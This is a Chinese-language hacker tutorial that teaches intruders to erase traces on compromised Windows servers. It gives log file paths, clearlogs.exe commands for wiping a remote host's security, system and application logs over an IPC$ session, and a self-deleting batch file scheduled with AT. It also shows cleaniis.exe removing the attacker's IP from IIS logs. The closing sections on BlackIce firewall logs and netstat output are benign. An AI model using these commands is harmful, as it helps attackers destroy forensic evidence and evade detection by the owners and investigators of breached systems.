应用程序日志、
安全日志、
系统日志、
DNS日志默认位置:%systemroot%\system32\config,默认文件大小512KB,管理员都会改变这个默认大小,
清理你入侵后的痕迹
。安全日志文件:%systemroot%\system32\config\SecEvent.EVT系统日志文件:%systemroot%\system32\config\SysEvent.EVT
应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT
FTP日志默认位置:%systemroot%\system32\logfiles\msftpsvc1\,默认每天一个
WWW日志默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志
以上日志在注册表里的键:应用程序日志,安全日志,系统日志,DNS服务器日志,
它们这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败
怎样删除这些日志:通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除.
下面就是很难的安全日志和系统日志了,守护这些日志的服务是EventLog,试着停掉它!D:\SERVER\system32\LogFiles\W3SVC1>netstopeventlog这项服务无法接受请求的"暂停"或"停止"操作。
怎么清除系统日志.
怎么利用工具清除IIS日志
怎么清除历史和cookie
怎么察看防火墙Blackice的日志
netstat-an表示的什么意思
===================================
1.系统日志通过手工很难清除.这里我们介绍一个工具clearlog.exe
使用方法:
Usage:clearlogs[\\computername]
-app=应用程序日志
-sec=安全日志
-sys=系统日志
a.可以清除远程计算机的日志
**先用ipc连接上去:netuse\\ip\ipc$密码/user:用户名
**然后开始清除:方法
clearlogs\\ip-app这个是清除远程计算机的应用程序日志
clearlogs\\ip-sec这个是清除远程计算机的安全日志
clearlogs\\ip-sys这个是清除远程计算机的系统日志
b.清除本机日志:如果和远程计算机的不能空连接.那么就需要把这个工具传到远程计算机上面
然后清除. 方法:
clearlogs -app这个是清除远程计算机的应用程序日志
clearlogs -sec这个是清除远程计算机的安全日志
clearlogs -sys这个是清除远程计算机的系统日志
安全日志已经被清除.SUCcess:Theloghasbeencleared 成功.
为了更安全一点.同样你也可以建立一个批处理文件.让自动清除.做好批处理文件.然后用at命令建立一个计划任务.让自动运行.之后你就可以离开你的肉鸡了.
例如建立一个c.bat
rem==============================开始
@echo off
clearlogs-app
clearlogs-sec
clearlogs-sys
delclearlogs.exe
delc.bat
exit
rem==============================结束
在你的计算机上面测试的时候可以不要你可以看到结果
第一行表示:运行时不显示窗口
第二行表示:清除应用程序日志
第三行表示:清除安全日志
第四行表示:清除系统日志
第五行表示:删除clearlogs.exe这个工具
第六行表示:删除c.bat这个批处理文件
第七行表示:退出
用AT命令.建立一个计划任务.这个命令在原来的教程里面和杂志里面都有.你可以去看看详细的使用方法
AT时间c:\c.bat
之后你就可以安全离开了.这样才更安全一点.
===================================
2.清除iis日志:
工具:cleaniis.exe
使用方法:
iisantidote
iisantidotestop
stopopitonwillstopiisbeforeclearingthefilesandrestartitafter
exemple:c:\winnt\system32\logfiles\w3svc1\dontforgetthe\
使用方法解释:
cleaniis.exeiis日志存放的路径清除参数
什么意思呢??我来给大家举个例子吧:
cleaniisc:\winnt\system32\logfiles\w3svc1\192.168.0.1
这个表示清除log中所有此IP(192.168.0.1)地址的访问记录. -----推荐使用这种方法
cleaniisc:\winnt\system32\logfiles\w3svc1\/shop/admin/
这个表示清除这个目录里面的所以的日志
c:\winnt\system32\logfiles\w3svc1代表是iis日志的位置(windowsnt/2000)这个路径可以改变
c:\windows\system32\logfiles\w3svc1代表是iis日志的位置(windowsXP/2003)这个路径可以改变
这个测试表示在日志里面没有这个ip地址.
我们看一下日志的路径 再来看一下
我们的ip(192.168.0.1)已经没有了.
已经全部清空.
同样这个也可以建立批处理.方法同上面的那个.
===================================
3.清除历史记录及运行的日志:
cleaner.exe
直接运行就可以了.
===================================
4.察看blackice的日志.
这个地方我们可以清除的看到 防火墙的日志.
这个表示有人发过来带有病毒的email附件. ip是:220.184.153.116
tcp_probe_other 表示通过tcp扫描或者利用别的和你建立连接通信
这个表示通过端口80扫描iis
病毒nimda
这里需要很多的计算机协议知识.同时也需要对英语有了解
才能更好的分析如果对英语不好你可以装一个金山词霸.
一般情况下我们可以对一些可以不用管.
一般这三种情况不用去管.
最上面的critical这个 可以去关注一下.一般是确实有别的计算机扫描或者入侵你的计算机
count代表次数 intruder是对方的ip event是通过什么方式(协议)扫描或者想入侵的
time表示时间
5.===================================
netstat-an表示什么意思?
使用这个命令可以察看到和本机的所有的连接.
Proto LocalAddress ForeignAddress State
协议 本地端口及IP地址 远程端口及IP地址 状态
LISTENING 监听状态 表示等待对方连接
ESTABLISHED 正在连接着.
TCP 协议是TCP
UDP 协议是UDP
TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED
这个表示 利用tcp协议本机ip(192.168.0.10)通过端口:1115和远程ip(61.186.97.54)端口:80连接
80端口表示 http 就是你在访问这个网站.
一般情况下远程ip的端口:80218000这个都是正常的.如果是别的就可以看一下你的计算机了.